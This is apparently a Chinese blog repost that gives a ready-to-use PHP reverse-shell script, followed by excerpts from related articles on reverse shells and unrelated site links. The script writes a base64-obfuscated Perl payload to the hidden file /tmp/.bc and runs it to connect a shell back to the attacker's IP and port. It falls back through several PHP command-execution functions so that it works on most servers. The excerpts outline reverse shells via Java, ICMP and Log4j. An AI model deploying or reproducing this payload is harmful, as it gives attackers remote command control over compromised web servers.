PHP代码实现反弹shell
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀
转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html
<?php
function which($pr) {$path = execute("which $pr");return ($path ? $path : $pr);}
function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')) {$res = @shell_exec($cfe);} elseif(function_exists('system')) {@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {$res = '';
while(!@feof($f)) {$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){if($fp=@fopen($fname,'w')) {@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
PHP代码实现反弹shell相关推荐
- PHP反弹shell
步骤详解: 前提: ①.PHPStudy开启相关服务. ②.假设木马已上传至服务器且可以访问(即执行代码才能反弹shell). ③.攻击机器和受害服务器要处于同一网段. 1.划线为攻击机的IP+端口. ...
- log4j 2 远程代码执行漏洞原理与搭建反弹shell
log4j2漏洞出来有一段时间了, 该修复的都修复的差不多了, 是时候可以公开让大家了解下原理以及如何构建整套体系了. 本文虽然是靶机, 但原理上还是可以攻击其它漏洞机器的. 建议测试即可, 不然你就 ...
- java Runtime.getRuntime().exec 获取反弹shell
说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...
- icmp反弹shell 简介
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起.当年的网费还是挺贵的,大学生上个网还是容易"破产"呀.当 ...
- python3 利用eval反弹shell
在最近的python开发中 用到了 字符串转字典 使用了eval 这让我想起了php中的eval 搜索一下果然问题严重 既然有问题 那就来试试反弹shell吧 看看效果 搜索一下 找到了 python ...
- linux 反弹shell(二)反弹shell的本质
0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...
- Struts2漏洞导致的反弹shell——青藤云安全使用的是agent进程采集器进行检测
安全老司机 | Struts2漏洞爆发后,与黑客的一次正面交锋 from:https://zhuanlan.zhihu.com/p/66122521 备注: 青藤云安全:--用的是进程信息采集器 通过 ...
- centos7输入shell找不到命令_反弹shell原理与实现
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- CreateProcess 重定向CMD实现反弹shell
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell. // RedirectCmd.cpp : Defines the ent ...
最新文章
- javascript与java正则表达式写法的区别
- vba 窗体单选框怎么传回sub_VBA之EXCEL应用
- windows远程连接的几个问题
- NeuSomatic:基于深度CNN的肿瘤体细胞突变检测工具
- C语言学习之编程序,用getchar函数读入两个字符给cl和c2,然后分别用putchar函数和printf函数输出这两个字符
- bash颜色、变量、数组、相关脚本示例
- (32)Gulp CSS hack 与 Autoprefixer
- php 502状态码,Nginx502状态码处理
- 世界坐标和本地坐标之间的转换
- KMP实现圆周率PI中找字串
- python滤波器处理数据的优点_使用Python对原始信号应用合适的butterworth滤波器
- safari快捷图标不见了_桌面图标不见了怎么办?这里有妙招
- BEC高级商务英语考试应试技巧指南
- python 折线图平滑_使用matplotlib的平滑折线图
- linux 怎样停定时任务,linux停用cron定时执行任务的方法
- 亮相Google I/O,字节跳动是这样应用Flutter的
- android中app分享小程序卡片及跳转回app
- 关于python数字的一种下划线奇怪写法
- 解读 Centralized Feature Pyramid for Object Detection
- gdp python 变迁动图_卫星动图看西安12年变迁,满满都是泪!
热门文章
- 《曼巴精神:科比自传》读书摘记
- ZOOM直播实时字幕(PC端使用谷歌浏览器)
- linux puppy 安装软件,puppy linux(linux操作系统)V5.7.2 官方版
- decorators 参数_Django中decorators装饰器的使用
- 如何依靠副业赚钱,应对人到中年的职场危机
- 育儿-《让孩子远离焦虑》书中的精髓:家长如何帮助孩子解决他们自身的焦虑问题。
- 百分百面试题:遇到过线上问题没有?
- 照片拼图什么软件好?试试Design Your Collage mac
- 我眼中的CTO:提升IT管理的价值
- python自编BP神经网络